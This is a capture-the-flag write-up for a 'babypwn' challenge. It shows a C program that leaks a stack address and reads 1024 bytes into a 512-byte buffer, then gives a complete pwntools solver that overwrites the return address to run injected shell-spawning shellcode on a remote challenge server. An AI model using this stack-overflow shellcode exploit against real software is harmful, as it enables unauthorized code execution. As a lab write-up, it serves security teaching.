Rating:
We were given a binary file and it source code.
```
#include <stdio.h>
#include <unistd.h>
int main() {
setbuf(stdout, NULL);
char username[512];
printf("You shell play a game against @gehaxelt! Win it to get ./flag.txt!\n");
printf("Your game slot is at: %p\n", username);
printf("What's your name?\n");
read(1, username, 1024);
printf("Ok, it's your turn, %s!\n", username);
printf("You lost! Sorry :-(\n");
return 0;
}
```
The program will leak the stack address by printing it using the printf() with “%p” format (it will print the address of the username variable). Then, the program will ask the user to input data using the read() function with 1024 bytes as it maximal input size, and it will store the data into the username variable. However, since the variable ‘username’ can only hold data up to 512 bytes, this results in a buffer overflow vulnerability.
Due to the NX protection being disabled (which means the stack has permission rwx), we can inject a shellcode into the payload to gain a shell. To obtain the shellcode, simply overwrite the saved return instruction pointer (RIP) with the address of the ‘username’ variable using a Buffer Overflow.
Solver:
```
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pwn import *
from os import path
import sys
# ==========================[ Information
DIR = path.dirname(path.abspath(__file__))
EXECUTABLE = "/babypwn"
TARGET = DIR + EXECUTABLE
HOST, PORT = "52.59.124.14", 10020
REMOTE, LOCAL = False, False
# ==========================[ Tools
elf = ELF(TARGET)
elfROP = ROP(elf)
# ==========================[ Configuration
context.update(
arch=["i386", "amd64", "aarch64"][1],
endian="little",
os="linux",
log_level = ['debug', 'info', 'warn'][2],
terminal = ['tmux', 'split-window', '-h'],
)
# ==========================[ Exploit
def exploit(io, libc=null):
if LOCAL==True:
#raw_input("Fire GDB!")
if len(sys.argv) > 1 and sys.argv[1] == "d":
choosen_gdb = [
"source /home/mydata/tools/gdb/gdb-pwndbg/gdbinit.py", # 0 - pwndbg
"source /home/mydata/tools/gdb/gdb-peda/peda.py", # 1 - peda
"source /home/mydata/tools/gdb/gdb-gef/.gdbinit-gef.py" # 2 - gef
][0]
cmd = choosen_gdb + """
b *main+142
"""
gdb.attach(io, gdbscript=cmd)
io.recvuntil(b"Your game slot is at: ")
LEAKED_STACK = int(io.recvuntil(b"\n", drop=True).decode(), 16)
print("LEAKED_STACK :", hex(LEAKED_STACK))
RIP_OFFSET = 0x200+8 # sub rsp, 0x200 (+8 to overwrite rbp)
p = b""
p += asm(shellcraft.sh()).ljust(RIP_OFFSET)
p += p64(LEAKED_STACK)
io.send(p.ljust(1024, b"\x00")) # 1024 (the max input size), from: read(1, username, 1024);
io.interactive()
if __name__ == "__main__":
io, libc = null, null
if args.REMOTE:
REMOTE = True
io = remote(HOST, PORT)
# libc = ELF("___")
else:
LOCAL = True
io = process(
[TARGET, ],
env={
# "LD_PRELOAD":DIR+"/___",
# "LD_LIBRARY_PATH":DIR+"/___",
},
)
# libc = ELF("___")
exploit(io, libc)
```
